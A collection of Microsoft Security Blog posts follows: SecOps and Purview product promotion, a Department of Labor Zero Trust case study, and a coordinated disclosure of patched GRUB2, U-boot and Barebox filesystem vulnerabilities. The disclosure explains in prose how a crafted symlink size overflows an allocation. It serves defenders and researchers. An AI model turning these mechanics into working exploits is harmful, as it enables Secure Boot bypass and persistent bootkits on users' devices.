Microsoft

Transforming public sector security operations in the AI era

The cyberthreat landscape is evolving at an unprecedented pace, becoming increasingly dangerous and complex. Nation-state threat actors and cybercriminals are employing advanced tactics and generative AI to execute highly sophisticated attacks. This situation is further compounded by outdated technology and systems, shortage of cybersecurity talent, and antiquated processes, which are inefficient in handling the scale, complexity, and ever-evolving nature of these cyberattacks. With 62% of all cyberattacks targeting public sector organizations, it is crucial for these sectors to leverage state-of-the-art technology, powered by generative AI, to transform their cyber defense and stay ahead of these evolving threats.1

Microsoft’s Unified Security Operations for Public Sector

Discover how Microsoft helps public sectors modernize security operations to enhance cyber defense and streamline processes.

Read the datasheet Microsoft’s unified security operations for public sector

Embracing modern security technology, processes, and continuous skill development is vital for protecting public sector organizations. By leveraging innovations powered by generative AI, unparalleled threat intelligence, and best practices, public sectors can transform their security operations to effectively defend against emerging cyberthreats.

AI-powered security operations: Microsoft delivers innovations to effectively protect against today’s complex threat landscape. The AI-powered unified security operations platform offers an enhanced and streamlined approach to security operations by integrating security information and event management (SIEM), security orchestration, automation, and response (SOAR), extended detection and response (XDR), posture and exposure management, cloud security, threat intelligence, and AI into a single, cohesive experience, eliminating silos and providing end-to-end security operations (SecOps). The unified platform boosts analyst efficiency, reduces context switching, and delivers quicker time to value with less integration work.

Microsoft is committed to helping public sector customers accelerate threat detection and response through improved security posture across organizations with richer insights, multi-tenant management, early warnings, and increased efficiency through automation and generative AI. Through automatic attack disruption, Microsoft Defender XDR utilizes robust threat intelligence, advanced AI and machine learning to detect and contain sophisticated cyberattacks in real time, significantly reducing their impact. This high-fidelity detection and protection capability disrupts more than 40,000 incidents each month, like identity threats and human-operated cyberattacks, while maintaining a false positive rate below 1%.

“Speed is an important factor against adversaries, and gaining situational awareness across a complex landscape of threats is therefore key.”

—Customer in the healthcare industry

People and process modernization: Public-private partnerships play a vital role in fostering the exchange of best practices and developing standardized processes that drive efficiency in incident response and threat intelligence sharing. For example, adapting the threat triage process to leverage generative AI agents can enable teams to scale significantly with agents autonomously analyzing and triaging vast volumes of alerts in real time, prioritize critical cyberthreats, and recommend specific remediation steps based on historical patterns. These collaborations also empower organizations to build teams equipped with cutting-edge skills and a comprehensive understanding of generative AI capabilities, helping them stay ahead of emerging cyberthreats.

Collective cyber defense and threat intelligence: Using Microsoft’s global threat intelligence insights, public sector organizations can collaborate with each other and across other sectors to share deeper cyberthreat insights efficiently. This partnership enables public sector organizations to exchange threat intelligence in a standardized manner within a region or country.

“Collective defense collaborations are driven by mutual interests with industry peers and cybersecurity alliances on improving security postures and responding more effectively to emerging threats.”

—Customer in the transport industry

The power of generative AI in cyber operations

Generative AI brings several transformative benefits to cybersecurity, making it a cornerstone for public sector security operations center (SOC) modernization.

Enhanced threat detection and response: Generative AI has the potential to sift through data from firewalls, endpoints, and cloud workloads, surfacing actionable cyberthreats that might go unnoticed in manual reviews. Unlike traditional rule-based detection methods, generative AI can identify attack patterns, adapt to emerging cyberthreats, and prioritize incidents based on risk severity, helping security teams focus on the most critical issues. Generative AI can go beyond simply surfacing cyberthreats; it can contextualize attack signals, predict potential breaches, and recommend guided responses for remediation strategies, reducing the burden on security analysts. Microsoft Security Copilot is already covering a range of use cases and is expanding rapidly to seize the full potential of generative AI. By providing guided incident investigation and response, Security Copilot helps security operations center (SOC) teams to detect and respond to cyberthreats more effectively. It can help teams to learn about malicious actors and campaigns, provide rapid summaries, and even contact the user to check for suspicious behavior. Adoption is associated with 30% reduction in security incident mean time to resolution (MTTR).2

Reduced operational overheads: By automating routine tasks, generative AI can free analysts from repetitive processes like alert triage or patch validation, enabling them to focus on advanced threat hunting. Security teams can already leverage Security Copilot to translate complex scripts into natural language, highlighting and explaining key parts to enhance team skills and reduce investigation time for advanced investigations as much as by 85%, helping security teams operate at scale.3

“Increased support from AI is critical given the significant capacity challenge in the public sector: a shortage of talent, an influx of threats, and an ever-increasing volume of data, assets, and organizations.”

—National SOC customer

Building a resilient digital future together

As nation-state threat actors and cybercriminals increasingly employ generative AI in their cyberattacks, public sector organizations can no longer rely on fragmented, manual defenses. The path forward lies in public-private collaboration, centered on co-designing and innovating solutions tailored to the public sector’s unique needs.

By adopting Microsoft Security solutions, public sector organizations can leverage combined resources, expertise, and cutting-edge technology to fortify critical infrastructure, safeguard citizen data, and strengthen public trust.

Now is the time to act: Modernize your cyber defense in the AI era to collectively forge a more secure and resilient digital future for government and public sector operations.

Learn more

Learn more about the AI-Powered Security Operations Platform for more details on the unified Security Operations platform.

Learn more about Microsoft Sentinel.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Microsoft Digital Defense Report 2024

2Generative AI and Security Operations Center Productivity: Evidence from Live Operations, Microsoft study. James Bono, Alec Xu, Justin Grana. November 24, 2024.

3Forrester Total Economic Impact™ of Microsoft Sentinel. The Total Economic Impact(TM) Of Microsoft Sentinel, a commissioned study conducted by Forrester Consulting, March 2024. Results are based on a composite organization representative of interviewed customers.

The post Transforming public sector security operations in the AI era appeared first on Microsoft Security Blog.

Categories: Microsoft

Analyzing open-source bootloaders: Finding vulnerabilities faster with AI

Microsoft Malware Protection Center - Mon, 03/31/2025 - 12:00pm

By leveraging Microsoft Security Copilot to expedite the vulnerability discovery process, Microsoft Threat Intelligence uncovered several vulnerabilities in multiple open-source bootloaders, impacting all operating systems relying on Unified Extensible Firmware Interface (UEFI) Secure Boot as well as IoT devices. The vulnerabilities found in the GRUB2 bootloader (commonly used as a Linux bootloader) and U-boot and Barebox bootloaders (commonly used for embedded systems), could allow threat actors to gain and execute arbitrary code.

Using Security Copilot, we were able to identify potential security issues in bootloader functionalities, focusing on filesystems due to their high vulnerability potential. This approach saved our team approximately a week’s worth of time that would have otherwise been spent manually reviewing the content. Through a series of prompts, we identified and refined security issues, ultimately uncovering an exploitable integer overflow vulnerability. Copilot also assisted in finding similar patterns in other files, ensuring comprehensive coverage and validation of our findings. This efficient process allowed us to confirm several additional vulnerabilities and extend our analysis to other bootloaders like U-boot and Barebox, which share code with GRUB2. We’re sharing this research as an example of the increased efficiency, streamlined workflows, and improved capabilities that AI solutions like Security Copilot can deliver for defenders, security researchers, and SOC analysts. As AI continues to emerge as a key tool in the cybersecurity community, Microsoft emphasizes the importance of vendors and researchers maintaining their focus on information sharing. This approach ensures that AI’s advantages in rapid vulnerability discovery, remediation, and accelerated security operations can effectively counter malicious actors’ attempts to use AI to scale common attack tactics, techniques, and procedures (TTPs).

While threat actors would likely require physical device access to exploit the U-boot or Barebox vulnerabilities, in the case of GRUB2, the vulnerabilities could further be exploited to bypass Secure Boot and install stealthy bootkits or potentially bypass other security mechanisms, such as BitLocker. The implications of installing such bootkits are significant, as this can grant threat actors complete control over the device, allowing them to control the boot process and operating system, compromise additional devices on the network, and pursue other malicious activities. Furthermore, it could result in persistent malware that remains intact even after an operating system reinstallation or a hard drive replacement.

We disclosed these vulnerabilities with the GRUB2, U-boot, and Barebox maintainers and worked with the GRUB2 maintainers to contribute fixes for the discovered vulnerabilities. To address the issues, the GRUB2 maintainers released security updates on February 18, 2025, and both the U-boot and Barebox maintainers released updates on February 19, 2025. We thank the GRUB2, U-boot, and Barebox maintainers as well as the open-source community for their quick response and collaborative efforts in addressing these issues, and we advise users to ensure their instances are up to date. We would also like to thank the RedHat support team for their assistance in disclosing these issues to manufacturers. The respective vulnerabilities are summarized in the following table:

BootloaderVulnerabilityGRUB2CVE-2024-56737GRUB2CVE-2024-56738GRUB2CVE-2025-0677GRUB2CVE-2025-0678GRUB2CVE-2025-0684GRUB2CVE-2025-0685GRUB2CVE-2025-0686GRUB2CVE-2025-0689GRUB2CVE-2025-0690GRUB2CVE-2025-1118GRUB2CVE-2025-1125U-bootCVE-2025-26726U-bootCVE-2025-26727U-bootCVE-2025-26728U-bootCVE-2025-26729BareboxCVE-2025-26721BareboxCVE-2025-26722BareboxCVE-2025-26723BareboxCVE-2025-26724BareboxCVE-2025-26725

In this blog, we detail how Secure Boot and GRUB2 function, explain how the GRUB2 vulnerabilities could have been exploited, and provide information on the vulnerabilities found in other open-source bootloaders to highlight the risks associated with unknowingly sharing vulnerable code among different open-source projects. As the boot process involves multiple components spanning different manufacturers and vendors, updates and fixes to the Secure Boot process can be particularly complex and run the risk of rendering a device unusable. As such, we are also sharing these findings with the security community to emphasize the importance of responsible disclosure and collaboration in the effort to enhance protection technologies and security across different devices and platforms.

Secure Boot and GRUB2

Before 2006, Intel-based computers booted into startup firmware code commonly known as the BIOS (Basic Input/Output System), which was responsible for hardware initialization and setup of common services to later be used by a bootloader. Ultimately, the BIOS would transfer control to a bootloader coded in real mode, which would commonly load an operating system (OS).

With time, attackers realized there is no root-of-trust verification of bootloaders by the firmware, thus began the era of bootkits, which are bootloader-based rootkits. To standardize the boot process, a unified firmware schema to replace BIOS was introduced in 2006, which is currently known as the Unified Extensible Firmware Interface (UEFI).

UEFI also helped combat bootkits, as it offers services that validate bootloaders and its own extensible modules by means of digital signatures. That protocol is known as Secure Boot and is essential to establishing a root of trust for the boot process, in which the firmware verifies UEFI drivers and OS modules with a platform key or a Key Exchange Key, and bootloaders verify the loaded operating system.

Trust is then achieved with the help of equipment manufacturers, which can sign code trusted by Secure Boot, by means of Certificate Authorities (CA). Essentially, manufacturers sign code with their private key, and their public key is signed with a root CA, commonly Microsoft’s UEFI CA. This is also essential to supporting non-Windows bootloaders such as GRUB2 (which commonly boots Linux) and allowing third party operating systems to benefit from Secure Boot. Since GRUB2 is fully open-sourced, vendors install a small program called a shim, which is signed by Microsoft’s UEFI CA and is responsible for validating the integrity of GRUB2. The shim can further consult a mechanism called Secure Boot Advanced Targeting (SBAT) for further revocation and management options as SBAT is used by the shim to provide a way to track and revoke individual software components based on metadata rather than cryptographic signatures alone.

Figure 1. GRUB2 loading schema The dangers of a GRUB2

Since bootloaders run before operating systems run, they mostly have UEFI-provided services as APIs to rely on. Therefore, bootloaders do not benefit from modern operating system security features, such as:

  • No-Execute (NX): Known in Windows as Data Execution Prevention (DEP), and enforces memory page execute protections. Before the introduction of NX, attackers could override return addresses (which are maintained in-memory) and jump to arbitrary code (commonly a shellcode) that could be placed using the provided input.
  • Address Space Layout Randomization (ASLR): This feature randomizes the base address of modules, which makes return address overrides and function pointer overrides highly unreliable since attackers do not know where usable code might be found.
  • Safe dynamic allocators: Dynamic allocations are a favorite target for attackers, and modern operating systems harden their heap allocators with various techniques, including Safe Unlinking, type-safety, Pointer Authentication, and others.
  • Stack cookies / Canaries: These are randomly generated values pushed between the return address and local variables on the stack, with the intent of detecting changes in their values before using the return address (commonly in a RET instruction).

Additionally, GRUB2 offers complex logic to implement various features, including:

  • Image file parsers (PNG, TGA, and JPEG)
  • Font parsing and support (PF2 file format)
  • Network support (HTTP, FTP, DNS, ICMP, etc.)
  • Various filesystem supportability (FAT, NTFS, EXT, JFS, HFS, ReiserFS, etc.)
  • Bash-like command-line utility
  • Extensible dynamic module loading capabilities

Furthermore, GRUB2 is coded in C, which is considered a memory-unsafe language, and as mentioned, does not benefit from any modern security mitigation. Considering the implication of defeating Secure Boot and strategically assessing the project (such as with Google’s Rule of 2), it is evident why GRUB2 may be of interest to vulnerability researchers.

Several memory corruption vulnerabilities have been uncovered in the past and are evident of the risks that we have mentioned. Noteworthy examples include:

VulnerabilitySubsystem(s)DescriptionCVE-2020-10713Configuration fileThe vulnerability was published under the name “Boot Hole”, consisted of a buffer overflow in the parsing of the GRUB2 configuration file (grub.cfg).CVE-2021-3695
CVE-2021-3696
CVE-2021-3697Image parsingSeveral buffer overflow vulnerabilities were discovered when parsing images.CVE-2022-28733
CVE-2022-28734NetworkVarious buffer overflow vulnerabilities when parsing IP or HTTP packets.CVE-2022-28735ShimIt was discovered that non-kernel files could be loaded and execute arbitrary code.CVE-2023-4692NTFS (filesystem)A heap out-of-bounds was discovered in the NTFS filesystem implementation for GRUB2. Findings

Through a combination of static code analysis tools (such as CodeQL), fuzzing the GRUB2 emulator (grub-emu) with AFL++, manual code analysis, and using Microsoft Security Copilot, we have uncovered several vulnerabilities.

Using Security Copilot, we initially explored which functionalities in a bootloader have the most potential for vulnerabilities, with Copilot identifying network, filesystems, and cryptographic signatures as key areas of interest. Given our ongoing analysis of network vulnerabilities and the fact that cryptography is largely handled by UEFI, we decided to focus on filesystems.

Using the JFFS2 filesystem code as an example, we prompted Copilot to find all potential security issues, including exploitability analysis. Copilot identified multiple security issues, which we refined further by requesting Copilot to identify and provide the five most pressing of these issues. In our manual review of the five identified issues, we found three were false positives, one was not exploitable, and the remaining issue, which warranted our attention and further investigation, was an integer overflow vulnerability.

Figure 2. Security Copilot spotting an integer overflow vulnerability and suggesting a fix

We used Security Copilot to successfully identify similar patterns in other GRUB2 files. Assuming the possibility of false negatives, we performed thorough validation and review of GRUB2 to avoid overlooking any issues, allowing us to confirm several additional vulnerabilities were present relating to the integer overflow.

Through this research, we have disclosed the following vulnerabilities:

ModuleVulnerabilityCVEUFS (filesystem)Buffer overflow in symbolic link handling due to an integer overflow in allocation.CVE-2025-0677Squash4 (filesystem)Buffer overflow in file reads due to an integer overflow in allocation.CVE-2025-0678ReiserFS (filesystem)Buffer overflow in symbolic link handling due to an integer overflow in allocation.CVE-2025-0684JFS (filesystem)Buffer overflow in symbolic link handling due to an integer overflow in allocation.CVE-2025-0685RomFS (filesystem)Buffer overflow in symbolic link handling due to an integer overflow in allocation.CVE-2025-0686UDF (filesystem)Buffer overflow in block reads of UDF due to an out-of-bounds operation.CVE-2025-0689HFS (filesystem)Buffer overflow in filesystem mounting due to wild strcpy function on a non-NUL-terminated string.CVE-2024-56737HFS (filesystem) compressionBuffer overflow in file opens due to an integer overflow in allocation.CVE-2025-1125Crypto (cryptography)Cryptographic side-channel attack due to non-constant time memory comparison.CVE-2024-56738Read (commands)The read command is intended to read a line from the keyboard and assign its text to a variable and is susceptible to a signed integer overflow and an out-of-bounds write.CVE-2025-0690Dump (commands)While the memory reading commands (such as read_byte) are disabled in production, the dump command was left enabled and can be used to read arbitrary memory addresses.CVE-2025-1118

Most of those vulnerabilities are simple memory corruption vulnerabilities. As an example, let us examine the JFS symbolic link resolution function:

Figure 3. Vulnerable symbolic link resolution code in JFS

The vulnerability is an overflow of the size variable:

  • The size variable is declared as grub_size_t, which is ultimately defined as a 64-bit unsigned integer (uint64_t).
  • The function grub_le_to_cpu64 converts a Little-Endian 64-bit value to the CPU’s native Endianess. Since x86-64 is already Little-Endian, it does nothing (on Big-Endian systems it reverses the byte-order of the 64-bit input value).
  • Note the input data and its inode are fully attacker-controlled, since they supply the filesystem image. Therefore, size can get an arbitrary value, including the very large value 0xFFFFFFFFFFFFFFFF (which is the maximum value an unsigned 64-bit integer can get).
  • The linknest checks are irrelevant for the vulnerability, but they assure the number of nested symbolic links to not exceed a limit (defined as 8).
  • The size+1 calculation is an integer overflow—if size is 0xFFFFFFFFFFFFFFFF then size+1 is now 0. Note grub_malloc happily allocates a 0-byte chunk and returns it to the variable symlink.
  • At this point, symlink is being written to by the function grub_jfs_read_file. The contents are arbitrarily set by the attacker, and while this function will never be able to read 0xFFFFFFFFFFFFFFFF bytes, an attacker would still be able to override important data beyond the limit of the symlink variable with an arbitrary payload.

It seems GRUB2 maintainers were aware of other types of integer overflow issues in the past and therefore introduced functions such as grub_add and grub_mul to handle addition and multiplication overflows safely. However, it seems there are quite a few places where those functions have not been considered.

Figure 4. Proper symbolic link resolution in EXT2 filesystem—note how grub_add is used to check for overflows

The other vulnerabilities we’ve reported had similar out-of-bounds or integer overflow issues. In addition, we have reported a cryptographic side-channel attack issue, in which the function grub_crypto_memcmp does not perform its memory comparison in constant-time. The vulnerability is quite similar to one we disclosed on Netgear routers in the past.

Variant analysis and extensions to other bootloaders

After the discovery of the GRUB2 filesystem vulnerabilities and validating their exploitability, we concluded it is very likely other bootloaders might be affected by similar vulnerabilities, potentially as a result of the practice of copy-pasting filesystem parsing code between different open-source projects.

To test this hypothesis, we asked Security Copilot to find similar code in GitHub based on GRUB2’s filesystem implementations. This approach initially found many GRUB2 forks, so we continued to refine the search and manually review the results. Within those results, the U-boot and Barebox bootloaders, which are both commonly used for embedded systems, were identified as having shared code with GRUB2. Further investigation led us to identify similar vulnerabilities in both bootloaders, as detailed in the table below.

BootloaderVulnerabilityDescriptionU-bootCVE-2025-26726SquashFS directory table parsing buffer overflowU-bootCVE-2025-26727SquashFS inode parsing buffer overflowU-bootCVE-2025-26728SquashFS nested file reading buffer overflowU-bootCVE-2025-26729EroFS symlink resolution buffer overflowBareboxCVE-2025-26721Buffer overflow in the persistent storage for file creationBareboxCVE-2025-26722Buffer overflow in SquashFS symlink resolutionBareboxCVE-2025-26723Buffer overflow in EXT4 symlink resolutionBareboxCVE-2025-26724Buffer overflow in CramFS symlink resolutionBareboxCVE-2025-26725Buffer overflow in JFFS2 dirent parsing

To exploit those in an embedded system context, attackers would most likely require physical access to those devices.

Enhancing security beyond Microsoft with research and threat intelligence sharing

As our research demonstrates, the discovered vulnerabilities can impact a wide range of systems and devices with varying impact. The vulnerabilities in GRUB2 can be exploited to bypass Secure Boot and allow threat actors to gain arbitrary code execution in the context of GRUB2, install stealthy bootkits and persistent malware, and compromise additional devices on the network. Additionally, there are further consequences to bypassing Secure Boot as it undermines the security mechanism designed to protect the boot process. Secure Boot bypasses can lead to threat actors loading untrusted software and malicious code during the boot process, evading detection by security solutions, and gaining full control of the system for potential widespread impact across operating systems relying on UEFI Secure Boot. While the vulnerabilities impacting U-boot and Barebox may be more difficult to exploit for threat actors by requiring physical device access, the issues still underscore the dangers of sharing susceptible code across multiple open-source projects.

This research also demonstrates the necessity of responsible vulnerability disclosure, threat intelligence sharing, and partner collaboration in addressing these issues to safeguard users against current and future threats. Given the complexity of the boot process, which involves multiple components from different manufacturers, coupled with the fact that updates to Secure Boot can run the risk of rendering a device unusable, responsible disclosure of these vulnerabilities is necessary to prevent threat actor exploitation and give teams time to effectively coordinate and collaborate on mitigation measures.

To address the discovered issues, the GRUB2 maintainers updated the vulnerable versions in SBAT while working with manufacturers to update DBX database entries as well as their shims to improve Secure Boot revocation management, particularly for bootloaders like shim that act as an intermediary between firmware Secure Boot verification and Linux distributions boot processes. In addition to deploying patches to address the vulnerabilities, the GRUB2 maintainers disabled some of the OS modules when Secure Boot is enabled to help ensure only trusted and verified code executes during the boot process, further reducing the attack surface. We would like to again thank the GRUB2 team and open-source community for their efforts in addressing these issues, as well as the U-boot and Barebox maintainers for quickly releasing fixes.

Leveraging AI like Security Copilot was invaluable in our research, saving us approximately a week’s worth of time by efficiently identifying and refining security issues in bootloader functionalities, ultimately allowing us to uncover several vulnerabilities. Identifying, disclosing, and contributing fixes for vulnerabilities, such as those mentioned in this blog post, is part of our ongoing commitment to enhance security at Microsoft and beyond. Microsoft is dedicated to improving security through research-driven protections and collaboration with customers, partners, and industry experts. Microsoft security researchers discover vulnerabilities and threats, translating this knowledge into enhanced solutions that protect users daily, and by expanding our research, we also contribute to the security of devices worldwide across all platforms.

Jonathan Bar Or

Microsoft 365 Defender Research Team

References Learn more

Security Copilot customers can use the standalone experience to create their own prompts or run pre-built promptbooks to automate incident response or investigation tasks related to this threat.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Analyzing open-source bootloaders: Finding vulnerabilities faster with AI appeared first on Microsoft Security Blog.

Categories: Microsoft

New innovations in Microsoft Purview for protected, AI-ready data

Microsoft Malware Protection Center - Mon, 03/31/2025 - 11:00am

The Microsoft Fabric and Microsoft Purview teams are excited to be in Las Vegas from March 31 to April 2, 2025, for the second annual and highly anticipated Microsoft Fabric Community Conference. With more than 200 sessions, 13 focused tracks, 21 hands-on workshops, and two keynotes, attendees can expect an engaging and informative experience. The conference offers a unique opportunity for the community to connect and exchange insights on key topics such as data and AI.

Microsoft Purview: Built to safeguard your AI innovation

AI innovation is impacting every industry, business process, and individual. About 75% of knowledge workers today are currently using some sort of AI in their day to day.1 At the same time, the regulatory landscape is evolving at an unprecedented pace. Around the world, at least 69 countries have proposed more than 1,000 AI-related policy initiatives and legal frameworks to address public concerns around AI safety and governance.2 With the need to adhere to regulations and policy frameworks for AI transformation, a comprehensive solution is needed to address security, governance, and privacy concerns. Additionally, with the convergence of the responsibilities of cybersecurity and data teams, customers are asking for a solution that turns data security and data governance into a team sport to address issues such data discovery, data classification, data loss prevention, and data quality in a unified way. Microsoft Purview delivers a comprehensive set of solutions that address these needs, helping customers seamlessly secure and confidently activate their data in the era of AI.

We are excited to announce new innovations that help security and data teams accelerate their organization’s AI transformation:

  1. Enhancing Microsoft Purview Data Loss Prevention (Purview DLP) support for lakehouse in Microsoft Fabric to help prevent sensitive data loss by restricting access.
  2. Expanding Purview DLP policy support for additional Fabric items such as KQL databases and Mirrored databases to send users notification through policy tips when they are working with sensitive data.
  3. Microsoft Purview integration with Copilot in Fabric, specifically for Power BI.
  4. Data Observability within the Microsoft Purview Unified Catalog.
Seamlessly secure data

Microsoft Purview is extending its proven data security value delivered to millions of Microsoft 365 users worldwide, to the Microsoft data platform. This helps users drive consistency across their multicloud and multiplatform data estate and simplify risks related to data leaks, oversharing, and risky user behavior as more users are managing and handling data in the era of AI.

1. Enhancing Microsoft Purview Data Loss Prevention (DLP) support for lakehouse in Fabric to help prevent sensitive data loss by restricting access

Microsoft Purview Data Security capabilities are used by hundreds of thousands of customers for their integration with Microsoft 365 data. Since last year’s Microsoft Fabric Community Conference, Microsoft Purview has extended Microsoft Purview Information Protection and Purview DLP policy tip value across the data estate, including Fabric. Currently, Purview DLP supports the ability to show users notifications for when they are working with sensitive data in lakehouse. We are excited to share that we are enhancing the DLP value in lakehouse to prevent sensitive data leakage to guest users by restricting access. Data Security admins can configure policies and limit access to only internal users or data owners based on the sensitive data found. This control is valuable for when a Fabric tenant includes guest users and domain owners want to limit access to internal proprietary data in their lakehouses. 

Figure 1. DLP policy restricting access for guest users into lakehouse due to personally identifiable information (PII) data discovered 

Learn more about Microsoft Purview Data Loss Prevention 2. Expanding DLP policy support for additional Fabric items such as KQL databases and Mirrored databases to show users notification through policy tips when they are working with sensitive data

A key part of securing sensitive data is to provide visibility to your users on where and how they are interacting with sensitive data. Purview DLP policies can help notify users when they are working with sensitive data through policy tips in lakehouse in Fabric. We are excited to announce that we are extending policy tips support for additional Fabric items—KQL databases and Mirrored databases in preview. (Mirrored Database sources include Azure Cosmos DB, Azure SQL Database, Azure SQL Managed Instance, Azure Databricks Unity Catalog, and Snowflake, with more sources available soon). KQL databases are the only databases used for real-time analytics so detecting sensitive data that comes through real-time analytics is huge for Fabric customers. Purview DLP for Mirrored databases reduces the security risk of sensitive data leakage when data is transferred in Fabric. We are happy to extend Purview DLP value to more data sources, providing end-to-end protection for customers within their Fabric environments, all to prepare for the safe deployment of AI.

Figure 2. Policy tip triggered by Purview DLP due to PII being discovered in KQL databases.

Figure 3. Policy tip triggered by Purview DLP due to PII being discovered in Mirrored databases.

3. Microsoft Purview for Copilot in Fabric

As organizations adopt AI, implementing data controls and a Zero Trust approach is crucial to mitigate risks like data oversharing and leakage, and potential non-compliant usage in AI. We are excited to announce Microsoft Purview capabilities in preview for Copilot in Fabric, starting with Copilot for Power BI. By combining Microsoft Purview and Copilot for Power BI, users can:

  • Discover data risks such as sensitive data in user prompts and responses and receive recommended actions in their Microsoft Purview Data Security Posture Management (DSPM) dashboard to reduce these risks.
  • Identify risky AI usage with Microsoft Purview Insider Risk Management to investigate risky AI usage, such as an inadvertent user who has neglected security best practices and shared sensitive data in AI or a departing employee using AI to find sensitive data and exfiltrating the data through a USB device.
  • Govern AI usage with Microsoft Purview Audit, Microsoft Purview eDiscovery, retention policies, and non-compliant usage detection.

Figure 4. Purview DSPM for AI provides admins with comprehensive reports on Copilot in Fabric’s user activities, as well as data entered and shared within the copilot.

Confidently activate data 4. Data observability, now in preview, within Microsoft Purview Unified Catalog

Within the Unified Catalog in Microsoft Purview, users can easily identify the root cause of data quality issues by visually investigating the relationship between governance domains, data products, glossary terms, and data assets associated with them through its lineage. Data assets and their respective data quality are visible across your multicloud, hybrid data estate. Maintaining high data quality is core to driving trustworthy AI innovation forward, and with the new data observability capabilities in Microsoft Purview, users can now improve how fast they can investigate and resolve root cause issues to improve data quality and respond to regulatory reporting requirements.

Figure 5. Lineage view of data assets that showcases data quality within a Data Product.

Microsoft Purview and Microsoft Fabric can help secure and activate data

As your organization continues to implement AI, Microsoft Fabric and Microsoft Purview will serve as key solutions to safely activate your data for AI. Stay tuned for even more exciting innovations to come and check out the Fabric blog to read more about the innovations in Fabric.

Learn more about Microsoft Purview Learn more

Explore these resources to stay updated on our product innovations in security and governance for your data:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Work Trends Index

2AI Regulations around the World – 2025

The post New innovations in Microsoft Purview for protected, AI-ready data appeared first on Microsoft Security Blog.

Categories: Microsoft

US Department of Labor’s journey to Zero Trust security with Microsoft Entra ID

Microsoft Malware Protection Center - Thu, 03/27/2025 - 12:00pm

For several years, Microsoft has been helping United States federal and state government groups, including military departments and civilian agencies, transition to a Zero Trust security model. Advanced features in Microsoft Entra ID have helped these organizations meet requirements to employ centralized identity management systems, to use phishing-resistant multifactor authentication, and to consider device-level signals for authorizing access to resources.

Manage and protect with Microsoft Entra ID

The US Department of Labor (DOL) has been on a journey to consolidate their identity systems and modernize authentication to applications. In this blog post, I’ll describe the benefits they’re gaining from supplementing personal identity verification (PIV) cards with device-bound passkeys implemented through the Microsoft Authenticator app and from adding risk signals to Microsoft Entra Conditional Access policies.

To review how Microsoft Entra ID can help your department or agency meet federal cybersecurity requirements, while reducing complexity and improving the user experience, visit Microsoft Entra ID: Enhancing identity security for US agencies.

Adopting Microsoft Entra ID as a centralized identity system

Like many organizations, DOL first used Entra ID (then called Azure Active Directory) when they adopted Microsoft 365. At that time, they were maintaining multiple identity technologies, including on-premises Active Directory, Active Directory Federation Services, and Ping Federate. This fragmented strategy required users to authenticate to different applications using different identity systems.

With the help of their Identity, Credential, and Access Management (ICAM) group, DOL worked to consolidate all their identity systems to Entra ID. They chose Entra ID because it supports the necessary protocols (such as SAML and OIDC) to deliver a single sign-on (SSO) experience for most of their applications. This effort, which took about a year, included reaching out to application owners and encouraging them to move their applications off of Kerberos, ideally by adopting MSAL (Microsoft Authentication Library), so their applications could easily integrate with Entra ID.

Integrating applications with Entra ID makes it possible to strengthen security by applying Conditional Access policies to them. DOL at first applied simple Conditional Access policies that only allowed access to applications from hybrid-joined Government Furnished Equipment (GFE devices). The COVID-19 pandemic accelerated their adoption of additional features, such as enforcing device compliance through Microsoft Intune and reporting device risk to other security services through integration with Microsoft Defender for Endpoint. Policies could then make access decisions based on device risk, such as only granting access to applications from devices with “low risk” or “no risk.”

Increase protection with Microsoft Entra Conditional Access

For an introduction to Microsoft Entra Conditional Access, visit our documentation.

Upleveling static Conditional Access policies to risk-based Conditional Access policies

In 2022, when new regulations required government agencies to apply more stringent cybersecurity standards to protect against sophisticated online attacks, DOL decided to strengthen their Zero Trust implementation with phishing-resistant authentication and dynamic risk-based Conditional Access policies. Both would help them enforce the Zero Trust principle of least privilege access.

Microsoft Entra ID Protection capabilities made it possible for Conditional Access policies to assess sign-in risk and user risk, in addition to device risk, before granting access. Policies would tolerate different levels of user risk depending on whether the user signs in as a ‘privileged user’ or as a ‘regular user.’ Access for users deemed high-risk would always be blocked. Privileged users with low or medium risk would also be blocked. Regular users with low risk would have to reauthenticate within a set period of time, while users with medium risk would have to reauthenticate more frequently.

Block identity takeover with Microsoft Entra ID Protection

For more in-depth information on risk-based Conditional Access policies, visit our documentation.

Adding a layer of security for privileged users

A subset of DOL employees may operate as a ‘privileged user’ for some tasks and as a ‘regular user’ for others. To access less sensitive applications such as Microsoft 365, these employees sign in as a ‘regular user’ using a government-issued PIV card or Windows Hello for Business from their GFE device. To access highly sensitive applications and resources, or to execute sensitive tasks, they must sign in using a separate account that has privileged access rights.

Previously, the DOL assigned usernames, passwords, and basic multifactor authentication to privileged accounts, but this still left some risk of credential theft from phishing attacks. Since the most important accounts to secure are those with administrative rights, DOL chose to make privileged accounts more secure with phishing-resistant authentication, specifically, with device-bound passkeys in the Microsoft Authenticator app. This is faster and less expensive to support than issuing employees users a second PIV card and a second GFE device.

Privileged users only need to install the Microsoft Authenticator app on their government-issued cell phone. They don’t have to visit a special portal to provision and onboard their passkey. They simply sign in for the first time on their mobile phone using a Temporary Access Pass and set up their passkey in one fast, frictionless workflow. As an added benefit, passkeys also reduce the time to authenticate to DOL applications. According to Microsoft testing, signing in with a passkey is eight times faster than using a password and traditional multifactor authentication.1

After DOL finishes deploying passkeys for their privileged users, they plan to roll out passkeys to the rest of their workforce as a secondary authentication method that complements other passwordless methods such as Windows Hello for Business and certificate-based authentication (CBA).

To explore phishing-resistant authentication methods available with Microsoft Entra, explore the video series Phishing-resistant authentication in Microsoft Entra ID.

Using “report-only” mode in Conditional Access as a modeling tool

